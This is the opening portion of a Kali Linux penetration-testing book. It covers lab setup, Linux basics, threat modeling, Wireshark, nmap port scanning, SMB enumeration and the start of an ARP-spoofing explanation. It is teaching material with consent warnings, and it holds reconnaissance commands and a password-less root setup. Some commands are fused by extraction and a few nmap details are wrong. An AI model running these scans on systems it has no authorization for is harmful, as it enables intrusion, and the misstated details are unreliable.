Ethical Hacking With KALI Linux

Made Easy

MOHAMAD MAHJOUB
Acknowledgement
This book couldn’t have happened without the involvement of many people.
First and foremost is my wonderful family that is supporting me. My amazing
mom, my brother Tarek, and my brother Ziad. Not to forget my wonderful
friends who are providing me with the emotional support while being away
from my home country. After my family and friends, there is an amazing
team of people who have helped me write this book. Hussein Baghdad, my
online friend whom I have never met till date. He and his ghost team of
designers, proofreaders, and editors are of the main reason I’m publishing
this book. I’m truly lucky to have met Hussein; having him onboard this
journey had a huge impact in making this book a reality.

This book you are about to read had no prayer of getting in front of you
without the amazing people who have helped me acquire my knowledge
throughout the year. The journey was not easy, but totally worth it from the
learning perspective. To all of these people, I am deeply grateful.

Finally, I dedicate this book, to the soul my late father; I miss you dad.

Mohamad
September 2020
Content
INTRODUCTION
The Undeniable Power of Ethical Hacking
SETUP YOUR LAB
Why Kali?
Different Installation Methods
Install KALI
Install Windows (Target machine)
Master KALI desktop environment
SETUP YOUR KALI SERVER
Get Started with Linux Commands
Explore Main Services and Install Necessary Programs
STEPS TO PLAN A SUCCESSFUL PENETRATION TEST
Threat Modeling
9+ WAYS TO ATTACK A NETWORK
Wireshark Simplified
How Does Port Scanning Work?
How Does the UDP Scanning Work?
Introducing NMAP
NMAP and ZENMAP Simplified
Understand NETBIOS and SMB Attacks
Execute Man-in-the-Middle Attacks
Perform a DNS Spoofing Attack
Identify a DNS Zone Transfer Vulnerability
Plan DOS and DDOS Attacks
All-in-one Metasploit Framework
Create Your First Trojan and Infiltrate a Target
Explore the Powerful Armitage Tool
Hide a Payload in a JPEG Image
HOW TO ATTACK MODERN WIRELESS NETWORKS?
Introduction
WPA and WPA2 Cracking
WPS Cracking
4+ WAYS TO ATTACK A WEB APPLICATION
Web Applications Attack Surface
Metasploitable VM
Discover Vulnerabilities in Websites
Control Database Server with SQLMap
Easily Hack a WordPress Site
Intercept, Analyze, and Replay Web Traffic
SIMPLE WAYS TO GAIN ACCESS
Various Password Attacks
 Hashing in a Nutshell
Execute an Offline Password Attack on Linux
Execute an Offline Password Attack on Windows:
Run an Online Password Attack on Linux
Run an Online Password Attack on a Router
Crack Passwords with Rainbow Tables
Design Effective Wordlists
PROVEN SOCIAL ENGINEERING TECHNIQUES
Attack Vectors
Open-source Intelligence (OSINT):
Google Dorks Live Examples
Collect and Visualize Data with Maltego
Execute a Phishing Attack
Hack Facebook, Twitter, and Gmail Accounts
PERFORM ATTACKSON MOBILE PHONES
Mobile Attack Surface
Decrypt TLS Sessions
Reverse Engineer an Android Application
Hack an Android Phone and Download its Contacts
MAINTAIN ACCESS
Post-Exploitation Terminologies
Backdoor Tools Explained
Netcat Simplified
Install a Backdoor
Deface a Website in Few Seconds
Understand the Hidden Tear Ransomware
Bypass Firewalls by Tunneling Data and Commands over DNS
SECRET SAUCE BONUS
Wi-Fi Jamming Tool
Create a $3 Rubber Ducky Key-logger
Introduction
The Undeniable Power of Ethical Hacking
An ethical hacker, also referred to as a white hat hacker, is an information
security expert who systematically attempts to penetrate a computer system,
network, application or other computing resources on behalf of its owners,
and with their permission, to find security vulnerabilities that a malicious
hacker could potentially exploit.
The purpose of ethical hacking is to evaluate the security of and identify
vulnerabilities in systems, networks or system infrastructure. It includes
finding and attempting to exploit any vulnerability to determine whether
unauthorized access or other malicious activities are possible.
Ethical hacking entails an ongoing cycle of research and attacks against a
target or a boundary. It is a set of processes and procedures used by
penetration testers in order to circumvent the controls of a certain information
system. These controls can be categorized into technical, administrative and
operational. At the end of the day, the owner will be presented by a
professional report that shows all of these controls, the vulnerabilities in
addition to an executive summary of the engagement.
So, what is an ethical hacker?
An ethical hacker is a person who can access the system on behalf of its
owner after getting a written consent, it is very important here to obtain the
consent. The objective of ethical hacking is to make the world a safer place. It
is a real world audit in order to reveal a certain security posture.
We have different types of hackers; white-hat hackers, black-hat hackers and
the grey-hat hackers.
The white-hat hackers are the type of penetration testers that we will refer to
throughout this book, we are the good guys. A white-hat hacker will have
access to the system on behalf of its owner in order to test it and reveal the
security weaknesses it has. Meanwhile, black-hat hackers will access systems
without any consent or permission from their owner, in order to perform
some hidden agenda.
Meanwhile, the grey-hat hackers lie in between, they usually access systems
without permission, but they do not have some hidden agenda, they just do
this for their own benefit.
The name of the game is to identify vulnerabilities in systems that can be
exploited. It is important to note that the skills that you will learn should not
be leveraged to break into anything that you do not have permission to. It is
completely illegal to access systems that you do not have explicit or written
permission to, we will perform everything on our VM, virtual machines or
the systems that you actually own.
Again, I repeat, this is very important. Please do not exercise the skills that
you will learn throughout this book to attack systems you do not own.
As Kali is updated on a daily basis, the GUI and the screenshots available in
this book might for some of the applications look slightly different from the
ones in the version you are using.

Setup Your Lab

Why Kali?
Kali Linux is specifically geared to meet the requirements of professional
penetration testing and security auditing. To achieve this, several core
changes have been implemented in Kali Linux which reflect these needs:
Single User Access by Design
Due to the nature of security audits, Kali Linux is designed to be used in a
‘single user’ scenario. As of version 2020.1, offensive security introduced a
default non-root user named kali. The password is kali as well.
Many of the tools used in penetration testing require escalated privileges.
Throughout this book, you need to use sudo before the commands then enter
the password, or you can to use the below command to have a password-less
privilege escalation.
sudo apt install -y kali-grant-root &&sudodpkg-reconfigure kali-grant-
root
Throughout the book, I will be directly using the root account. To do so, you
can use the command sudo su .

The default look and feel after employing the sudo su is clear format. To
add the original format, you need to replace the content of the .bashrc file
with the content of this file on my GitHub repository, as seen below
https://github.com/redpython961/kali/blob/master/bashrc.txt
To do so, Install leafpad using sudo apt-get install leafpad , open bashrc file,
then replace its content from the content of the GitHub file, then save the file
and restart the terminal.
root@kali:/home/kali# leafpad ~/.bashrc

Network Services Disabled by Default

Kali Linux contains system hooks that disable network services by default.
These hooks allow us to install various services on Kali Linux, while
ensuring that our distribution remains secure by default, no matter what
packages are installed. Additional services such as Bluetooth are also
blacklisted by default.
Custom Linux Kernel
Kali Linux uses an upstream kernel, patched for wireless injection.
A Minimal and Trusted Set of Repositories
Given the aims and goals of Kali Linux, maintaining the integrity of the
system as a whole is absolutely a key. With that goal in mind, the set of
upstream software sources which Kali uses is kept to an absolute minimum.
Many new Kali users are tempted to add additional repositories to their
sources list, but doing so runs a very serious risk of breaking your Kali Linux
installation.
Kali is considered to be the premier operating system for penetration testing,
forensics, security audit and other related use. Consider it as a weapon for
you in order to perform any kind of security engagement, because it is the
only one solution that has lots of security applications, as we are going to see.
Kali is the successor of backtrack, which used to have many applications that
perform similar functionalities. This has been deprecated in Kali. The main
features of Kali are that, it is always a free system; it is a robust solution that
can be updated very easily. It has more than 300 penetration testing tools,
which is really awesome! It has support for lots of devices, including
Raspberry Pi, microcomputers, Android, etc.
It is completely customer visible with multilingual support. The main tools
that we will be exploring through this book, just to name a few, are
Metasploit which is a post-exploitation tool used for network penetration
testing, NMAP for vulnerability scanning, air crack-ng to crack into wireless
network, John the Ripper, a password cracking utility, etc.

Different Installation Methods

There are different installation methods. The first approach is to download an
ISO image from the website, burn it onto a DVD and install it from there.
The second approach is to install Kali Linux on an SD card or a USB
memory stick and boot a live version from there; this is mainly used for
microcomputers such as Raspberry Pi or Orange Pi.
Another approach is to use and boot from PXE environment over the network
and install Kali from there. What we are going to do in this book is to
download a VMware image and import it onto our VMware Workstation
Player.

Install KALI
You need to go to the VMware website and install the VMware Workstation
Player from there. It is a free tool if you are using it for your personal
purpose, but if you are using it for commercial use, it has an active license
only for a few days. So, feel free to download this player and install it from
the downloads section or you can go directly to the following website
https://www.vmware.com/products/workstation-player/workstation-player-
evaluation.html.
You can as well use Oracle Virtual Box from
https://www.virtualbox.org/wiki/downloads, which will do the same job.
Once you open the VMware Workstation Player for the first time, it will be
empty since there are no virtual machines yet. What you need to do is to go to
www.offensive-security.com website or https://www.kali.org/downloads/ and
download the Kali Linux VMware image from there.
In this case, I will be downloading the 64-bit version. The downloaded image
will be in a compressed form, so you need to extract it, and then go to your
VMware Workstation Player again, press on Open a Virtual Machine link
(see below), navigate to the files extracted, locate the VMX file, and press
open.
As you will notice, the virtual machine name pops up under the home button,
you can directly press on the ‘Play virtual machine’ or you can edit the
virtual machine settings in terms of resources.
Two gigabytes of RAM are enough for the machine to run. Keep the other
default settings and press on the ‘Play’ button.
After some time, the login screen will pop up and you will have to enter the
default username which is kali and the default password, kali. Make sure you
are using the credentials relevant to the release you ae using.
After logging on for the first time, the resolution might be incorrect. For this
purpose, you can open the main menu, press on Settings, then select Display
to setup the proper resolution.

Install Windows (Target machine)

After installing the Kali Linux machine, it is time to install the victim’s
machine, a Windows 10 operating system. For this purpose, you need to
navigate to the following web address https://developer.microsoft.com/en-
us/microsoft-edge/tools/vms/ where you can download a trial version of
Windows 10. The license is set to expire after three months. Select the virtual
machine that you want, in our case, it will be Microsoft Edge on Windows 10
(see below) and the platform is, and of course, VMware and just download
the zip file.

Note that the password is Passw0rd!

Extract the files, then go to VMware Workstation Player and press ‘Open a
Virtual Machine’ button, navigate to the extracted files, select the OVR file
and press ‘Open’. Here you can name the virtual machine, we will name it
Windows 10, and then we can press on ‘Import’.
Now we you should be able to see the windows 10 virtual machine
populated. You can edit the virtual machine settings by selecting the image
and going to the ‘Edit virtual machine settings’ (see below).

Set the memory for the virtual machine to 2,048 MB, and press ‘OK’. Now
we have the windows 10 machine up and running and we have our lab setup.
Master KALI desktop environment
Press on the main menu (see below), to find that there are more than 300
applications used for penetration testing, security auditing, forensics, etc.
These 300 applications are well spread over the categories of information
gathering, vulnerability analysis, web application analysis, database
assessment, password attacks, wireless attacks, reverse engineering, etc. It is
easy to spot an application directly under the category of attacks that you are
planning to do.
The menu item next to the main menu is the File Manager, as in Windows.
You can navigate directories just by double clicking any folder. You have the
option to open a directory as GUI or in the terminal.

Also you can see the workspaces toggle buttons. The concept of workspace is
important if you are planning to running multiple applications, so that you
can switch between them without disrupting the display.

For example, if we have an open terminal, and some other applications, the
terminal will be workspace one, we can go to workspace two and open other
applications without even closing or disrupting the initial applications open.
Itis a brilliant feature in Kali.
You can see as well the wired connection, wireless connection(s) if there is
any; virtual machines usually cannot access the internal (built-in) wireless
card. You will learn under the wireless section how to set up this, you can as
well turn off the machine, using the log out button, with the below options.

Feel free to explore the desktop environment and get familiar with it.
Setup Your KALI Server
Get Started with Linux Commands
It is important to learn a couple of Linux commands before continuing with
this book. We are not going to go deep into scripting, but shed the light on
basic Linux commands that will help us jumpstart and continue the rest of the
book.
Many of the applications have graphical interfaces, so we will be able to
make most of our penetration tests within these graphical interfaces. But
learning command line is very powerful and very helpful; I bet you will enjoy
it. Some of the commands we will use are listed below. Remember to use the
sudo command if you are using the default kali account.

passwd
ls
pwd
cd
mkdir & rmdir
locate
man & help
cat
nano
leafpad
grep
less
ifconfig
display

The best practice whenever you log in to any new machine is to change your
current password. The tool provided by Kali is passwd . Type passwd and
follow the wizard. We will enter the password in the text box and write it
again, and the new password is setup.
The next command is the ls , which means list. If you press enter, it will list
all the directories and files in your current working directory. ls has some
arguments that can help you explore more about the files you are listing.
For example: ls-l . If you want to know more about these arguments that you
can pass, you can use either Help or Manual. For the ls program, we will
type in help and you will see all the help provided with the ls program, all
the arguments and how we can use all these arguments, it is pretty much
helpful as you will see.

On top of that you can use the man command as well. Man means manual
man <space> ls , then you hit enter, it will show you the manual provided
with this command. Some of the programs provide manual and others do not
provide manual, it depends on the program that you are using.
The next command is cd or Change Directory. If you want to know your
current working directory, you can use the command pwd (Print Working
Directory).
It is important to mention that all these commands in Kali and Linux in
general are case sensitive. So if you write pwd (P uppercase), it will tell you
that the command is not found. So you should write everything in the lower
case as pwd .
We will get our current working directory, which is the root, we can list the
files, we can change using cd command, and we can go to any of the
displayed directories. For example: Music (M in uppercase).
So, if you want to go back to the original path or directory, use: cd <space>
<dot><dot> , and you are back to the directory. You can as well toggle
through the previous commands that you used, using the up arrow and down
arrow. Even if you close the terminal and open it again, you can still use the
up and down buttons for this purpose.
The next command on our list is the Make Directory. So, we will use ls
again, then go into Music folder for example and create a directory: mkdir
pop . We type ls again, and we will get the directory, I can remove this
director as well using: rmdir , or remove directory, pop, ls again.

One of the important commands cat , which helps us print the content of the
file to the terminal. For example, if we have a file on the desktop called:
demo.txt, and we want to print the content on the screen, we can use cat ,
then we have to write the name of the file. The content of the file will be
displayed as shown below.

If we want to change the content of the file, we can use another command:
nano <space> the name of the file (demo.txt), then the nano program opens
and we can simply edit the file.
We can add records at the end and then press "control x", it asks us: "Do you
want to save?" we will say "Yes". If you used nano again, you will see the
file updated.
One of the important commands that we will be using through this book is
the grep command. grep searches for a string in a file. And this is very
important when we are doing our analysis, sometimes we want to search for a
certain text within a file or within a list of returned values, this application
will help us a lot. So if I use the same file (demo.txt and search for the word
command, for example, I use grep , command and name of the file, and it
returns back the command word along with the line where this word appears.

Another command that can help us, especially when we are looking into huge
files, is the less command. So, we can choose a huge file, and we will use
less , and then we will paste the file name and then open it. So, it opens the
file, but not at once, you can sequentially go forward or backward in this file
by using the “Control F” to go forward and “Control B” to go backward.
It fetches the file bit by bit, so you will be able to view it moderately, and if
you want to quit just press Q and you are out of the file.
Another important command to use is the ifconfig , which is similar to the
ipconfig on Windows machines, it displays the current IP that we are using,
as well as the subnet mask and the default gateway.
Another useful command is locate , which is used to find files in a very
quick way. But before that, it is recommended to use the updatedb
command, which will build a local database for all the files on the system.
And then when you can use the locate command. You will be using this
database to determine the location of the file. Suppose that we are searching
for a file called "crontab", it will return the file in all the paths.

If you want to clear the screen, just use the clear command, it clears
everything, and you can still use the up and down arrows, to retrieve previous
commands.
The final command to talk about is the uname command, which shows you
the version of Kali you are working on.

Explore Main Services and Install Necessary Programs

The default installation ships with several pre-installed services such as SSH,
HTTP and MySQL. To learn how to enable and disable these services, we
will start with the most common service used, SSH, which is usually used to
provide remote access to computers over a safe and secure protocol that
transfers data in an encrypted way. To enable the service and start it, use the
below commands.
sudo service ssh start
To make sure whether the service is running or not, type the command:
sudo netstat -antp | grep ssh
Doing so will tell the grep command to print the lines that have SSH. We
will see that SSH, which is running on port 22 is currently active. To disable
the service, use “stop” instead of “start” and click enter again. We can use the
same command: sudo netstat -antp | grep ssh , to see that the service is not
running anymore.

The next service we will discuss is HTTP, which is mainly used to host
websites. So again, if you want to start the service, the command is:
sudo service apache2 start
And if you want to see if the service is running, we go to the same netstat
command, and instead of SSH, we type apache2 , and you will see the
service apache2 running on port 80.
We can stop the service as well by using “stop” instead of “start”. It is a
pretty straightforward task, just type the name of the service, then “start” or
“stop”.

Now we will learn how to install services that are not available by default in
the distribution, such as FTP. If we type for example:
sudo service vsftpd start
We will get an error, it is actually not installed. So how do we install it?
We use the command:
sudo apt-get install vsftpd
It will take some time to install the service. If we want to run the service as
we did before, use the command:
sudo service vsftpd start
To verify if the service is running, we use the command:
sudo netstat-antp | grep vsftpd
We will see that the FTP service is running on port 21 as shown below.

FTP service is vulnerable by design; so let us uninstall it using the following

command:
sudo apt-get remove vsftpd

Starting and stopping services manually each time is not a practical thing to
do. There is a way that enable these services at boot time. For this purpose we
can use the following command:
sudo update-rc.dssh enable

This command will enable SSH to start automatically at boot time. We can do
the same for the rest of the protocols. If you need to disable the service, use
the command instead “disable” instead of “enable”.
Steps to Plan a Successful Penetration
Test
Planning a penetration testing exercise is the name of the game. It always
starts with the reconnaissance phase, and ends with the reporting phase.
Below is the list of some tools and techniques used in each of the phases.

Threat Modeling
Threat modeling is understanding the system we have at hand, whether it is a
mobile application, web application, or even a network, and identifying all
the possible threats it would face and assessing the threat scenarios that might
happen.
In straightforward terms, it is about finding different ways within which our
system can be attacked, and subsequently designing countermeasures to stop
these attacks. Threat modeling helps us become more proactive and strategic
in our operational and application security. The ultimate goal is to reduce the
attack surface and focus on the investment of the business itself.
It actually starts by a couple of questions, what are we working on? So, we
have to identify the assets and then what can go wrong?
After identifying the assets and attaining the architectural overview of the
system, we ask ourselves several questions, "How can the system be
attacked? what can go wrong?" We need to pinpoint those questions. After
that, what are we going to do about it? So, we start thinking about
countermeasures and the controls we will have in place, and at the end, we
need to assess our job, "Did we do a good job?"

Threat modeling springs from the trivial risk assessments model. We need to
identify threats in the first place, whether it is process, it is software, it is an
attacker, anything can be a threat. The threat can attack our systems by taking
advantage of weaknesses we have or vulnerabilities we have.
The purpose of a threat modeling is to close the gaps of vulnerabilities, to put
controls in order to close those vulnerabilities.

Below are some of the benefits of Threat Modeling:

• Identifying, investigating and rating potential threats and vulnerabilities
• Identifying logical thought processes for defining the system's security
• Creating a set of standard documents that can be used to create
specifications and security testing and prevent future duplication of
security efforts
• Reducing threats and vulnerabilities
• Defining the overall security level of a system or application

Different methods and techniques are used by pen testers, practitioners and
analysts to understand the variety of information security risks. Some of
those structured threat modeling techniques are Attack Trees, Stride Method,
Elevation of Privileges, T-Map, Petri net, Data Flow Diagram, Activity
Diagram and Risk Reduction Overview. One of the most famous models used
is the Stride model.
After having the architecture overview or after simplifying our process or
system and projecting it on a diagram, we start thinking about what can go
wrong? How does this web application or mobile application workflow go?
Do we care about what can go wrong with this application for, example?
Does it have financial information? How about the content? Where is the data
stored? Etc.
We spend much of time analyzing each of the steps in our architectural
overview; one of the simplest techniques that can help us is Stride. Stride is a
mnemonic for spoofing, tampering, information disclosure, repudiation,
denial of service and elevation of privilege. The technique is used for
identifying a threat in these six areas. See the detailed explanation below.
Threat Definition Property Example
Spoof identify Pretend to be Authentication Hack an email
someone else and send a
message under
the name of
the victim
Tamper data Changing data or Integrity Change the
code source code of
an application
Repudiation Deniability Non-repudiation No I did not
send this email
 Information Leakage of Confidentiality PII
Disclosure sensitive information
information available on
the Internet
Denial of Non-availability Availability Web
Service of service application not
responding to
user requests
Elevation of Perform Authorization Normal user is
Privilege unauthorized able to delete
actions other accounts

Many mitigation approaches exist such as using passwords, multifactor

authentication and digital signatures to protect against spoofing attacks. We
can use access control lists and again digital signatures to protect against data
tampering. We can use secure logging, auditing, and digital signatures to
protect against repudiation. Access list controls can be implemented to
protect against information leakage. Filtering techniques can be employed to
protect against denial of service. To protect against elevation of privileges,
we can implement input validation and access control techniques.
9+ Ways to Attack a Network
Wireshark Simplified
You must have heard of the famous Wireshark network sniffing tool, the
world's leading network traffic analyzer. Wireshark lets you understand
protocols, analyze network traffic in real time, and is often the best tool for
troubleshooting issues on your network.
Wireshark uses the libraries on Linux and Windows called libpcap and
winpcap ; Linux packet capture and Windows packet capture consecutively.
If you have used this tool before, you might have been overwhelmed with
lots of traffic. The secret to effectively use the tool is to use the Capture and
Display filters. So, before demonstrating how Wireshark works, let us go
back to basics and learn how we establish a basic TCP connection.
When there is a communication between the client and a server, the client
sends a SYN packet, the server replies back with a SYN/ACK packet, then
the client confirms back with an ACK packet, and here the connection is
established.

This is a full round TCP connection. You might have noticed that the server
always replies with the sequence number plus one, then the client replies with
the previous sequence number plus one.
Similarly, the same routine is followed when we are terminating a
connection. The client sends the server a FIN packet, then the server replies
with a FIN/ACK packet, then the client confirms with an ACK packet and the
connection is terminated.
To demonstrate and show example from Kali machine, we will connect using
Netcat, and we will try to use the previous example of texting using the
chatting between the client and the server, then we will fetch the traffic and
analyze the traffic and see what happened.

To open Wireshark, you go to the menu under sniffing and spoofing. First of
all, you need to filter the interface that you want to capture traffic on. You
will discover that, by default, you have lots of filters and if you capture all the
traffic coming on these filters, you will end up with a huge amount of data
and information.
It is very important to understand the layout of the Wireshark, it is divided
into three main views. The most important part is the capture engine, it is
capturing the traffic based on the capture filters defined; on top you will find
the display and the display filters. (See below).

We are only interested in capturing traffic on the wired interface, or the

Ethernet interface. Double click on that interface to start capturing packets.
Sniffing must have started now. Go to your cloud server or to a Windows
virtual machine on your network and open port 2222. From our Kali
machine, we open a terminal and invoke the following command:
nc -nv IP address 2222
Now we will be able to establish a connection between Kali machine and the
Windows machine. We can now send and receive text messages, a chat so to
speak.
Type “Hello from Kali”, then we go to the Windows machine, and we will
find that the text is prompting, we can reply back; if you get to Kali again,
you will be able to find the message. (As shown below)

So, certain activity has been taking place between the client and the server.
Now we can go to Wireshark and stop the packet capture. We will end up
with a small capture, similar to the one shown below. All you need to do is to
right click on one of the TCP packets and follow the TCP stream, to be able
to view the data communication between Kali and the Windows machines in
clear text.
How Does Port Scanning Work?
Port scanning is the process of checking for open ports, TCP or UDP ports on
a remote machine, it is very important that you think of the traffic
implications of your scans before you perform any, as it might have possible
effects on the target machines.
We have two methods for scanning a TCP port, the first method is called
Connect and the second method is called Syn/Stealth. The first method is
purely based on the three-way TCP handshake mechanism. The Connect port
scanning involves attempting to complete a three-way handshake with the
target host on the specific port. If the handshake is totally completed, this
indicates that the port is open.
As for the Syn/Stealth scanning, it is a TCP port scanning method that
involves only sending Syn packets to various ports on the target machine
without completing the three-way TCP handshake. If the TCP port is open a
Syn Ack packet should be sent in return. And this means that the port is open
without the need to send the final packet to the target machine. It is called
stealth because with the early and primitive firewalls, this method opens half
a three-way handshake connection and often bypasses the login of the
firewall, but this is not the case anymore with the new firewalls, as your
scans will be detected.
UDP scanning is different than TCP scanning; as we know TCP is connection
oriented while UDP is stateless, so it does not have a three-way handshake
mechanism. So, scanning a UDP port is somehow different than scanning a
TCP port. It is actually important to get into these details as understanding
these basics will help us a lot going through this book.

How Does the UDP Scanning Work?

An empty UDP packet is sent to the specific port and if the UDP port is open,
we expect no reply will be sent back to us from the target machine. But if the
UDP port is closed, an ICMP port unreachable packet should be sent back to
us from the target machine. UDP port scanning is somehow unreliable as
firewalls and routers have the option to drop the ICMP packets, this can be
misleading to us. So, people prefer not to scan UDP services and stick only to
scanning TCP ports.
One of the most popular and robust port scanners to date is the famous Nmap
tool. You can literally see complete penetration testing reports which are
totally based on Nmap tool. It is a great tool, it is very important to
understand, because it will help you a lot in your career. It has numerous
features and not only port scanning. The default Nmap TCP scanning will
scan like thousand most popular ports on a given machine. But again,
consider the amount of traffic that you will be generating. These default
thousand ports can generate megabytes of traffic. So, imagine if we scan a
full class B network, imagine the size of traffic that will be generated.

Introducing NMAP
Many systems and network administrators find Nmap useful for tasks such as
network inventory, managing service upgrade schedules, and monitoring host
or service uptime. Before going further with exploring different options on
how to use Nmap, it is important to understand the basic options, because
will can get complex later on. Nmap is a case sensitive tool, so make sure you
type in the proper case, as shown below.
Option Name Description
-sS TCP SYN The default and quickest way to scan
scan thousands of ports. Half-open
scanning.
-sT TCP Connect The system call completes connections
 Scan to open target ports rather than
performing the half-open reset that
SYN scan does.
-sU UDP Scan UDP scan works by sending a UDP
packet to every targeted port
-sN TCP Null This option sends TCP packets with
Scan none of the TCP flags set in the
packet. If the scan is returned a RST
packet it means the port is closed,
however if nothing is returned it is
either filtered or open
-sn Ping/Sweep Only send ping packet to the target, no
port scanning. This is useful if you
need to determine what hosts are in the
vicinity, but do not want to scan them
yet
-v Increase This will give your extra information
verbosity in the data outputted by nmap
-T4 Timing 0: paranoid, 1: sneaky, 2: polite, 3:
template normal, 4: aggressive, 5: insane
-sV Enumerate Actively probe open ports to try
determine what service and version
they are running
-P Port Comma separated list of ports to scan
-oG Grepable Redirect the output to a text file
output
-F Fast mode Instead of scanning as many ports as
the default scan does, the fast scan
only scans the common 100
-O Check OS nmap tries to determine the OS type
-A Check OS + Detect OS and Services
-Pn Skip Assume the host is up thus skipping
discovery the host discovery phase
--script Use script This argument takes in a comma
separated list of files, categories and
 directories containing NSE scripts

The -sS option stands for the TCP syn scan, which is the quickest way to
perform a scan, as mentioned before. It is based on half opening the TCP
three-way handshake. As for the -sT option, we are telling the Nmap to use
the three-way handshake to establish a connection with the target and to
determine if the ports are open. When we are scanning ports that are based on
UDP, such as DNS, we have to use the -sU option.
Another option to perform a scan is to use the -sN option, which basically
sends TCP packet with no flag set because the SYN packet and the
SYN/ACK and the ACK packets have a flag set, like the sequence flag and
the ack flag. So, we will send a packet with null flag set or zero flag set, if the
scan returned an RST or rest packet, it means that the destination port is
closed. However, if nothing is returned, it means that the port is open or
filtered. The -sn option stands for pinging or sweeping the target, we are
pinging the target just to know if it is alive. So, if it is alive, we might take
into consideration the next step of scanning it, so it is just probing the
network without actually scanning.
The -v option is used to increase verbosity. This will give us extra
information and progress information about our scan, the -T option is a
timing template, in where 3 is the default option, and 5 is the fastest one or
paranoid, while zero is the slowest one. It can take you from a couple of
milliseconds, performing an insane scan, up to a couple of minutes
performing a paranoid scan. The -sV option is used to enumerate and
determine the services and the version of the OS that is running on the
destination host. -P stands for port, -oG is used to redirect the output to a
text file for further analysis. -O is used to check the OS type, -A is used to
detect the OS and services running, the Pn is used to skip discovery and just
pretend that the host is up and running and implement the scans, and the --
script is to inject the Nmap scripting engine which is very useful in
performing what is beyond just port scanning.

NMAP and ZENMAP Simplified

ZENmap, a graphical and a user friendly version of the Nmap tool, has all the
precepts of what we are going to study in this section. First of all, if you want
to have an Nmap target selection, the default command is:
 Nmap <the IP address of your local machine>
And then you press enter, and wait for the results, as shown below.

You can get the same results using a hostname instead of an IP address, for
example:
nmap www.abcd.com
If you want to scan a range of IP addresses, or a subnet you can use:
nmap<then the IP address range>
If you have a determined list of IP addresses, put them in a text file, and issue
the following command:
nmap - iL<then the name of the file>

Scanning a specific port requires the usage of the -p option as seen below.
If you want to do a fast scan, you can use the attribute F which scans the
most common used ports. It is good to mention that the default nmap
command scans thousand ports and can take some time. So if you want to
scan the most common port numbers, use the minus -F attribute. Notice that
we have the SSH port open in addition to the Netbios port, SMB ports are
open as shown at the bottom of the below example.

If you want to do an extensive scan for all the ports, issue the following
command:
nmap -p 1-65535 -T4 -A -v IP address
It will take a huge amount of time, because it is scanning almost all the
65,000 ports.
Some attributes to understand:
-p is the port numbers from one till 65535.
-T4 template is the timing template. Actually, this is an attribute that
can go from T0 to T5. T0 being the slowest type of scan, and T5 being
the fastest type of scan, we are controlling how the response of Nmap
and how fast it is in this scan. So actually, this is a timing template and
it gives the user an easy way to tune how fast Nmap performs.
-A attribute is an option that allows Nmap to make effort in identifying
the target OS, the services and the versions. It also does a trace route
and as well applies some NSE which are engine scripts in order to detect
additional information. This is a huge scan and it is actually quite noisy
as it applies to many different scans.
If you want to select the type of the scan, use the following command:
nmap -sT <the IP address>
As we mentioned earlier, we have two types of scans, the syn scan which is
the default one and the connect scan. If you want to force Nmap to use the
connect scan, you issue the attribute -sT . If you want to use the default type
of scan, use -sS attribute.
If you want to scan UDP port, you use the attribute -sU and then you need to
specify the port types or the port numbers that you are scanning.
If you want to output the result of a certain scan to a text file, use the -oG
option to find the result of the scan in the text file you specify.

Understand NETBIOS and SMB Attacks

The server message block SMB protocol has a poor security track over the
last decade due to its complex implementation and open nature.

Many versions have been devised:

SMB 1 - Windows 2000
SMB 2 - Windows Server 2008 and Windows Vista SP1
SMB 2.1 - Windows Server 2008 R2 and Windows 7
SMB 3.0 - Windows Server 2012 and Windows 8 / 10
The latest SMB versions are 3.0.2 with Windows 8.1 and Windows Server
2012, and the latest one is SMB version 3.1.1 on Windows 10 and Windows
Server 2016. And this is the newest version. There are some tools in Kali
specialized in getting NetBIOS information such as NBTScan. The command
will give you the NetBios name, the server, the Mac address, etc.., as shown
below.

There is another tool named enum4linux , used for the same purpose. The
syntax is enum4linux then -a option, and then we put the IP address. This
tool enables you to have more information than the NBTScan. The target
windows machine used in the below example is recent, so you will not be
able to find these vulnerabilities that exist in the previous SMB version. But
to give you an overview of what this tool is, you will have information about
the users created on this machine, the groups, the password policies, the
details of the password policy, the host, the UX and some share information.
This is an outstanding tool when it comes to discovering SMB vulnerability.

Execute Man-in-the-Middle Attacks

A man-in-the-middle attack is a type of cyberattack where a malicious actor
inserts him/herself into a conversation between two parties, impersonates
both parties and gains access to information that the two parties were trying
to send to each other. A man-in-the-middle attack allows a malicious actor to
intercept, send and receive data meant for someone else, or not meant to be
sent at all, without either outside parties knowing until it is too late.
Man-in-the-middle attacks encompass a broad range of techniques and
potential outcomes, depending on the target and the goal. But, before going
further, we need to start with the basics; with the OSI layers.
We have seven layers corresponding to application, presentation, session,
transport, network, data link and physical. We could always say that all
people seem to need data processing mnemonic to memorize logical structure
layout easily. The most important protocol we will discuss in this section is
called the ARP protocol, which actually functions at the data link layer, and it
is responsible to translate the IP addresses from layer three to MAC
addresses.
Layer Name Role Protocols Addressing
7 Application Access to HTTP,
network FTP,
resources DNS
6 Presentation Format,
encryption
and
compression
of data
5 Session Establish,
manage, and
terminate
sessions
4 Transport How much TCP, Port
data to send UDP
and receive
3 Network Move packets IP, ICMP IP
from source
to destination
2 Data Link Frame Ethernet MAC
formation II, ARP
1 Physical Transmission
of bits

ARP spoofing, or ARP poisoning is a technique in which the attacker sends

spoofed ARP messages to a LAN. Generally, the aim of this attack is to
associate the attackers MAC address with the IP of another host such as the
default gateway in most of the cases, causing the traffic to be sent to the
attacker’s IP address rather than the legitimate IP, in the normal situation.
In the below example, suppose that Mr. Nice’s computer trying to
communicate with the default gateway of IP 192.168.1.1. The computer will
naturally require knowing the destination MAC address, at a certain point of
time before sending the data. Mr. Nice’s computer will send an ARP request
as a broadcast message on the network asking all the hosts if they have the
MAC address of the destination IP. The computer concerned will reply by its
MAC address and this reply is cached on the Mr. Nice’s machine. That’s
what will happen under normal circumstances.

Under anomalous situations, Mr. Bad, a malicious user, will have access to
the network, it is very important to have access to the network, because this
attack only works this way. Mr. Bad will then send fake ARP replies saying
that his MAC address is associated to the advertised IP address. So, as you
can notice, there is no request for ARP, but Mr. Bad was able to send the
reply. This is the vulnerability in the protocol, you do not need to be
authenticated in order to send an ARP reply, and any host can just connect to
the network and send the fake ARP reply message. In this case, Mr. Nice will
cache this message that the IP is associated with the MAC address of Mr.
Bad. ARP protocol is the de facto protocol in network communication, with
such a vulnerability!
Anyone having access to the network can take advantage of this vulnerability
